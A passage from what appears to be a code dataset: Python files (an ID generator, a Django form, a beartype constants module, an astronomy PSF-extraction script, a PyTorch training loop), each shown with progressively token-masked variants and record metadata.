OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n# THE POSSIBILITY OF SUCH DAMAGE.\nimport os\nimport random\nimport string\n\n# Use cryptographic-safe random generator as provided by the OS.\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digitis.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters +\n string.digits)\n for _ in range(length))\n\n\n# Request ID Counter\n####################\n\nreq_c = None\npid = None\n\n\ndef request_id():\n # Using random is pretty slow. This is way quicker.\n # It uses cached proc id. Then only does this append counter.\n # per request...\n #\n # It may not be as unique, but highly unlikely to collide\n # with recent requet ids.\n global req_c, pid\n\n if req_c is None:\n req_c = random.randint(1000*1000, 1000*1000*1000)\n\n if pid is None:\n pid = str(os.getpid())\n\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n\n return pid + '-' + req_id\n", "import os\nimport random\nimport string\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digitis.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\nreq_c = None\npid = None\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digitis.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\nreq_c = None\npid = None\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digitis.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\n<assignment token>\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n<function token>\n" ]
false
88
c4624425f57211e583b5fbaec3943539ce6fea6f
from django import forms from . models import BlogPost class BlogPostForm(forms.ModelForm): class Meta: model = BlogPost fields = '__all__'
[ "from django import forms\nfrom . models import BlogPost\n\nclass BlogPostForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BlogPost\n\t\tfields = '__all__'", "from django import forms\nfrom .models import BlogPost\n\n\nclass BlogPostForm(forms.ModelForm):\n\n\n class Meta:\n model = BlogPost\n fields = '__all__'\n", "<import token>\n\n\nclass BlogPostForm(forms.ModelForm):\n\n\n class Meta:\n model = BlogPost\n fields = '__all__'\n", "<import token>\n<class token>\n" ]
false
89
a42f36fca2f65d0c5c9b65055af1814d8b4b3d42
#!/usr/bin/env python3 # --------------------( LICENSE )-------------------- # Copyright (c) 2014-2023 Beartype authors. # See "LICENSE" for further details. ''' Project-wide **standard Python module globals** (i.e., global constants describing modules and packages bundled with CPython's standard library). This private submodule is *not* intended for importation by downstream callers. ''' # ....................{ IMPORTS }.................... # ....................{ NAMES }.................... BUILTINS_MODULE_NAME = 'builtins' ''' Fully-qualified name of the **builtins module** (i.e., objects defined by the standard :mod:`builtins` module and thus globally available by default *without* requiring explicit importation). '''
[ "#!/usr/bin/env python3\n# --------------------( LICENSE )--------------------\n# Copyright (c) 2014-2023 Beartype authors.\n# See \"LICENSE\" for further details.\n\n'''\nProject-wide **standard Python module globals** (i.e., global constants\ndescribing modules and packages bundled with CPython's standard library).\n\nThis private submodule is *not* intended for importation by downstream callers.\n'''\n\n# ....................{ IMPORTS }....................\n\n# ....................{ NAMES }....................\nBUILTINS_MODULE_NAME = 'builtins'\n'''\nFully-qualified name of the **builtins module** (i.e., objects defined by the\nstandard :mod:`builtins` module and thus globally available by default\n*without* requiring explicit importation).\n'''\n", "<docstring token>\nBUILTINS_MODULE_NAME = 'builtins'\n<docstring token>\n", "<docstring token>\n<assignment token>\n<docstring token>\n" ]
false
90
c23125018a77508dad6fd2cb86ec6d556fbd1019
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu May 21 11:40:26 2020 @author: jlee """ import time start_time = time.time() import numpy as np import glob, os from astropy.io import fits import init_cfg as ic # ----- Making scripts for PSFEx ----- # os.system("psfex -dd > config.psfex") if ic.use_backsub: prefix = 'b' else: prefix = '' f = open('psfex_all.sh','w') f.write('\n') f.write('#############################'+'\n') f.write('##### Scripts for PSFEx #####'+'\n') f.write('#############################'+'\n') f.write('\n') for i in np.arange(len(ic.fields)): f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n') f.write('\n') for j in np.arange(len(ic.filters)): flt = ic.filters[j].split('-')[1] f.write('rm -rfv prepsfex_'+flt+'.cat\n') f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ') f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf)) f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n") f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ') f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf)) f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n") f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ') f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ") f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ") f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ') f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n') f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n') f.write('\n') f.write('\n\n') f.close() # ----- Running scripts for PSFEx ----- # if (glob.glob("PSFEx/") == []): os.system("mkdir PSFEx") else: os.system("rm -rfv PSFEx/*") os.system("sh psfex_all.sh") os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/") os.system("mv -v prepsfex_*-*.cat PSFEx/") os.system("rm -rfv ./*.fits prepsfex_*.cat") # Printing the running time print("--- %s seconds ---" % (time.time() - start_time))
[ "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n", "<docstring token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\nstart_time = time.time()\n<import token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\n<assignment token>\n<import token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<assignment token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\n<assignment token>\n<import token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
91
81688d51696156905736b5de7a4929387fd385ab
import argparse import datetime import importlib import pprint import time import random import numpy as np import torch from torch.utils.tensorboard import SummaryWriter from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint def train(cfg, epoch, data_loader, model): data_time = AverageMeter("Data", ":6.3f") batch_time = AverageMeter("Time", ":6.3f") losses = AverageMeter("Loss", ":.4e") progress = ProgressMeter( len(data_loader)-1, [batch_time, data_time, losses], prefix=f"Epoch: [{epoch}]\t") model.train() end = time.time() for batch_nb, batch in enumerate(data_loader): d_time = time.time() - end data_time.update(d_time) global_step = model.global_step writer.add_scalar("time/data/train", d_time, global_step) report = model.training_step(batch, batch_nb) losses.update(report["loss"]) for k, v in report.items(): writer.add_scalar(f"{k}/train", v, global_step) b_time = time.time() - end batch_time.update(b_time) writer.add_scalar("time/batch/train", b_time, global_step) end = time.time() if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1: progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r")) def test(cfg, data_loader, model): data_time = AverageMeter("Data", ":6.3f") batch_time = AverageMeter("Time", ":6.3f") losses = AverageMeter("Loss", ":.4e") metrics = ["performance"] metrics = {m: AverageMeter(m, ":.4e") for m in metrics} progress = ProgressMeter( len(data_loader)-1, [batch_time, data_time, losses, *metrics.values()], prefix="Test:\t") model.eval() global_step = model.global_step end = time.time() for batch_nb, batch in enumerate(data_loader): data_time.update(time.time() - end) with torch.no_grad(): report = model.test_step(batch, batch_nb) losses.update(report["loss"]) for k, v in report.items(): if k not in metrics: metrics[k] = AverageMeter(k, ":.3f") metrics[k].update(v) batch_time.update(time.time() - end) end = time.time() if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1: progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r")) writer.add_scalar("loss/test", losses.avg, global_step) writer.add_scalar("time/batch/test", batch_time.avg, global_step) writer.add_scalar("time/data/test", data_time.avg, global_step) for k,v in metrics.items(): writer.add_scalar(f"{k}/test", v.avg, global_step) progress.display(len(data_loader) - 1, time_print) def main(cfg, pool=None): model = importlib.import_module(f"models.{cfg.model}").Model(cfg, pool=pool) if getattr(cfg, "load_model", False): model.load_ckpt() if model.device != "cpu" and torch.cuda.device_count() > 1: model = torch.nn.DataParallel(model) model = model.to(model.device) train_loader = model.get_train_loader() test_loader = model.get_test_loader() for epoch in range(cfg.num_epoch): time_print(f"\nEpoch {epoch} Training") train(cfg, epoch, train_loader, model) filename = "checkpoint.pth.tar" if not getattr(cfg.log, "overwrite_ckpt", True): filename = "_".join([str(epoch), filename]) save_checkpoint( state={ "epoch": epoch, "global_step": model.global_step, "state_dict": model.state_dict(), "opt_state_dict": {k: v.state_dict() for k,v in model.optimizers.items()}, "cfg": cfg, }, directory=cfg.log.misc_dir, filename=filename) time_print("\nTest") test(cfg, test_loader, model) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Run script") parser.add_argument("--config", "-c",type=str, required=False, default="config") args = parser.parse_args() git_state = get_git_state() config = importlib.import_module(f"configs.{args.config}").config config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S") config.log.misc_dir = config.log.dir / "misc" / config.log.exp_id config.log.tb_dir = config.log.dir / "tb" / config.log.exp_id config.log.misc_dir.mkdir(exist_ok=True, parents=True) config.log.tb_dir.mkdir(exist_ok=True, parents=True) torch.manual_seed(config.rnd_seed) np.random.seed(config.rnd_seed) random.seed(config.rnd_seed) if getattr(config, "anomaly_detection", False): torch.autograd.set_detect_anomaly(True) global writer writer = SummaryWriter( log_dir=config.log.tb_dir, comment=f"{config.description}, {git_state}") time_print(pprint.pformat(config)) time_print(f"Git head at state: {git_state}") try: if npp:=getattr(config, "n_process_pool", 0): with torch.multiprocessing.Pool(npp) as pool: main(config, pool=pool) else: main(config) except KeyboardInterrupt: time_print(f"Keyboard interrupt") exit(0)
[ "import argparse\nimport datetime\nimport importlib\nimport pprint\nimport time\nimport random\n\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter(\"Data\", \":6.3f\")\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n \n progress = ProgressMeter(\n len(data_loader)-1,\n [batch_time, data_time, losses],\n prefix=f\"Epoch: [{epoch}]\\t\")\n\n model.train()\n\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n\n global_step = model.global_step\n writer.add_scalar(\"time/data/train\", d_time, global_step)\n\n report = model.training_step(batch, batch_nb)\n\n losses.update(report[\"loss\"])\n\n for k, v in report.items():\n writer.add_scalar(f\"{k}/train\", v, global_step)\n\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar(\"time/batch/train\", b_time, global_step)\n end = time.time()\n\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end=\"\\r\"))\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter(\"Data\", \":6.3f\")\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n metrics = [\"performance\"]\n metrics = {m: AverageMeter(m, \":.4e\") for m in metrics}\n\n progress = ProgressMeter(\n len(data_loader)-1,\n [batch_time, data_time, losses, *metrics.values()],\n prefix=\"Test:\\t\")\n\n model.eval()\n\n global_step = model.global_step\n\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n \n losses.update(report[\"loss\"])\n\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, \":.3f\")\n metrics[k].update(v)\n \n batch_time.update(time.time() - end)\n end = time.time()\n\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end=\"\\r\"))\n\n writer.add_scalar(\"loss/test\", losses.avg, global_step)\n writer.add_scalar(\"time/batch/test\", batch_time.avg, global_step)\n writer.add_scalar(\"time/data/test\", data_time.avg, global_step)\n\n for k,v in metrics.items():\n writer.add_scalar(f\"{k}/test\", v.avg, global_step)\n\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f\"models.{cfg.model}\").Model(cfg, pool=pool)\n\n if getattr(cfg, \"load_model\", False):\n model.load_ckpt()\n\n if model.device != \"cpu\" and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n\n model = model.to(model.device)\n\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n\n for epoch in range(cfg.num_epoch):\n time_print(f\"\\nEpoch {epoch} Training\")\n train(cfg, epoch, train_loader, model)\n \n filename = \"checkpoint.pth.tar\"\n if not getattr(cfg.log, \"overwrite_ckpt\", True):\n filename = \"_\".join([str(epoch), filename])\n\n save_checkpoint(\n state={\n \"epoch\": epoch,\n \"global_step\": model.global_step,\n \"state_dict\": model.state_dict(),\n \"opt_state_dict\": {k: v.state_dict() for k,v in model.optimizers.items()},\n \"cfg\": cfg,\n },\n directory=cfg.log.misc_dir,\n filename=filename)\n \n time_print(\"\\nTest\")\n test(cfg, test_loader, model)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Run script\")\n parser.add_argument(\"--config\", \"-c\",type=str, required=False, default=\"config\")\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f\"configs.{args.config}\").config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n config.log.misc_dir = config.log.dir / \"misc\" / config.log.exp_id\n config.log.tb_dir = config.log.dir / \"tb\" / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n\n if getattr(config, \"anomaly_detection\", False):\n torch.autograd.set_detect_anomaly(True)\n\n global writer\n writer = SummaryWriter(\n log_dir=config.log.tb_dir,\n comment=f\"{config.description}, {git_state}\")\n\n time_print(pprint.pformat(config))\n time_print(f\"Git head at state: {git_state}\")\n\n try:\n if npp:=getattr(config, \"n_process_pool\", 0):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n time_print(f\"Keyboard interrupt\")\n exit(0)", "import argparse\nimport datetime\nimport importlib\nimport pprint\nimport time\nimport random\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n 